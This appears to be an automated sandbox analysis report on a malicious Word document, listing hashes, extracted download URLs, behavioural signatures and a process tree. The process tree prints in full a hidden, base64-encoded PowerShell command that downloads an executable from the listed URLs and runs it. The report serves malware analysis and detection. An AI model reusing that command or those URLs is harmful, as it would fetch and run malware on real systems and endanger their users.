Analysis
-
max time kernel
121s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 21:09
Static task
static1
Behavioral task
behavioral1
Sample
60a4c5a432b4e519acb03b05a8d0ca5ca96f5b0213ec9cc89d66b61ffdbe0edd.doc
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
60a4c5a432b4e519acb03b05a8d0ca5ca96f5b0213ec9cc89d66b61ffdbe0edd.doc
Resource
win10v2004-20241007-en
General
-
Target
60a4c5a432b4e519acb03b05a8d0ca5ca96f5b0213ec9cc89d66b61ffdbe0edd.doc
-
Size
230KB
-
MD5
2d097104f900cea49dba01d01eb75388
-
SHA1
7e7a7c380172d93f487539ccb277d838ac2950c7
-
SHA256
60a4c5a432b4e519acb03b05a8d0ca5ca96f5b0213ec9cc89d66b61ffdbe0edd
-
SHA512
639c665fbf18bc5bcacc4e6eee5c99e220aeb96fa35239c19410e3c10cb426c8a41a35d45fda6038b0be42ffb8d3afea19fd5ccb01625a93d1b86d972162297f
-
SSDEEP
6144:yg2k4itGiL3HJk9ND7b4hG4ux6N5WHWDJb:ygjQitkD7b4lq12
Malware Config
Extracted
http://moisesdavid.com/qoong/vy/
http://insurancebabu.com/wp-admin/iXElcu9f/
http://rishi99.com/framework.impossible/dhADGeie6/
https://www.alertpage.net/confirmation/2nX/
https://anttarc.org/chartaxd/DMBuiwf5u/
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2720 1728 WISPTIS.EXE 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2640 1728 WISPTIS.EXE 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2236 2624 Powershell.exe 34 -
Blocklisted process makes network request 5 IoCs
flow pid Process 6 2236 Powershell.exe 7 2236 Powershell.exe 8 2236 Powershell.exe 11 2236 Powershell.exe 13 2236 Powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2236 Powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FFCE8F67-454C-414F-B494-94FCF2FD5EE0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FFCE8F67-454C-414F-B494-94FCF2FD5EE0}\1.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{54752BB5-F3C7-4FCA-AE46-0E9068356EF9}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{54752BB5-F3C7-4FCA-AE46-0E9068356EF9}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{855FFDD1-0B4E-4CC2-897D-CEEBD7CE942D}\1.0\ = "Microsoft InkEdit Control 1.0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{54752BB5-F3C7-4FCA-AE46-0E9068356EF9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{54752BB5-F3C7-4FCA-AE46-0E9068356EF9}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{54752BB5-F3C7-4FCA-AE46-0E9068356EF9}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1728 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2236 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2236 Powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1728 WINWORD.EXE 1728 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1728 WINWORD.EXE 1728 WINWORD.EXE 2720 WISPTIS.EXE 2640 WISPTIS.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1728 wrote to memory of 2300 1728 WINWORD.EXE 31 PID 1728 wrote to memory of 2300 1728 WINWORD.EXE 31 PID 1728 wrote to memory of 2300 1728 WINWORD.EXE 31 PID 1728 wrote to memory of 2300 1728 WINWORD.EXE 31 PID 1728 wrote to memory of 2720 1728 WINWORD.EXE 32 PID 1728 wrote to memory of 2720 1728 WINWORD.EXE 32 PID 1728 wrote to memory of 2720 1728 WINWORD.EXE 32 PID 1728 wrote to memory of 2720 1728 WINWORD.EXE 32 PID 1728 wrote to memory of 2640 1728 WINWORD.EXE 33 PID 1728 wrote to memory of 2640 1728 WINWORD.EXE 33 PID 1728 wrote to memory of 2640 1728 WINWORD.EXE 33 PID 1728 wrote to memory of 2640 1728 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\60a4c5a432b4e519acb03b05a8d0ca5ca96f5b0213ec9cc89d66b61ffdbe0edd.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2300
-
-
C:\Windows\SYSTEM32\WISPTIS.EXE"C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;2⤵
- Process spawned unexpected child process
- Suspicious use of SetWindowsHookEx
PID:2720
-
-
C:\Windows\SYSTEM32\WISPTIS.EXE"C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;2⤵
- Process spawned unexpected child process
- Suspicious use of SetWindowsHookEx
PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABCAHcAbABiAGoAagBtAGoAegB2AD0AJwBJAHQAbQBwAG0AcgBuAGgAbABsAHUAJwA7ACQAVgBpAGkAaQBnAHAAegBlAGUAcwB2ACAAPQAgACcAOAA3ADMAJwA7ACQATgBqAHMAdABiAGgAbAB1AG8APQAnAFUAcgBlAGEAZgB2AG4AdABzAHgAdwBuAG8AJwA7ACQASwBkAHEAZwBsAHcAYQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAGkAaQBpAGcAcAB6AGUAZQBzAHYAKwAnAC4AZQB4AGUAJwA7ACQASAByAHkAcABjAHAAdQBiAD0AJwBRAGYAdQBpAGYAbwBlAGQAJwA7ACQATQBrAHgAdABqAGkAYQByAHIAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBOAHQAOwAkAFYAZwB4AHAAcgBhAG0AagBzAGIAPQAnAGgAdAB0AHAAOgAvAC8AbQBvAGkAcwBlAHMAZABhAHYAaQBkAC4AYwBvAG0ALwBxAG8AbwBuAGcALwB2AHkALwAqAGgAdAB0AHAAOgAvAC8AaQBuAHMAdQByAGEAbgBjAGUAYgBhAGIAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQBYAEUAbABjAHUAOQBmAC8AKgBoAHQAdABwADoALwAvAHIAaQBzAGgAaQA5ADkALgBjAG8AbQAvAGYAcgBhAG0AZQB3AG8AcgBrAC4AaQBtAHAAbwBzAHMAaQBiAGwAZQAvAGQAaABBAEQARwBlAGkAZQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAGwAZQByAHQAcABhAGcAZQAuAG4AZQB0AC8AYwBvAG4AZgBpAHIAbQBhAHQAaQBvAG4ALwAyAG4AWAAvACoAaAB0AHQAcABzADoALwAvAGEAbgB0AHQAYQByAGMALgBvAHIAZwAvAGMAaABhAHIAdABhAHgAZAAvAEQATQBCAHUAaQB3AGYANQB1AC8AJwAuACIAUwBQAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAEEAaQBnAGYAcQBoAGQAcABrAHIAdwBlAD0AJwBaAHUAdwB6AGgAawBhAHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAdQB6AGgAZABmAHEAbwBjAGoAdwB4ACAAaQBuACAAJABWAGcAeABwAHIAYQBtAGoAcwBiACkAewB0AHIAeQB7ACQATQBrAHgAdABqAGkAYQByAHIALgAiAEQAYABPAHcATgBgAGwATwBBAEQAZgBpAEwARQAiACgAJABDAHUAegBoAGQAZgBxAG8AYwBqAHcAeAAsACAAJABLAGQAcQBnAGwAdwBhAG8AKQA7ACQATwBwAHMAawBtAGoAcgBqAHkAYQBhAHoAbAA9ACcAVQBsAGUAcQBmAGcAbQBlAHQAagBrAHIAZgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEsAZABxAGcAbAB3AGEAbwApAC4AIgBsAGAARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA2ADkANwA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgBUACIAKAAkAEsAZABxAGcAbAB3AGEAbwApADsAJABLAGEAaQByAGEAcABzAGMAYgB6AG0APQAnAFoAegBqAGUAYQBtAHoAdwAnADsAYgByAGUAYQBrADsAJABSAGIAbAB5AGIAYwByAGwAPQAnAEoAcQB6AGMAYQB5AGYAcwBjAHAAZgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAagBiAG4AZgBqAGYAdQA9ACcAUQBxAHAAcQByAGEAagBuAHoAawBzAGoAYQAnAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444B
MD53a8ecb24176c3604886bdc8e72abe42e
SHA147d9d464819436a04e381947262d933daddeed4b
SHA2566170896174f60ab3581f24f86574b05c925d84637b412bd81b8f87fadc304109
SHA512580ef9c4266b26b16b26c40ead255c4d38bfe6eb095be8ef24c2eafdfae385651ab40a3432d9918728b1473653f8f6ef0faca0b143535f69359e79e98f1b11bc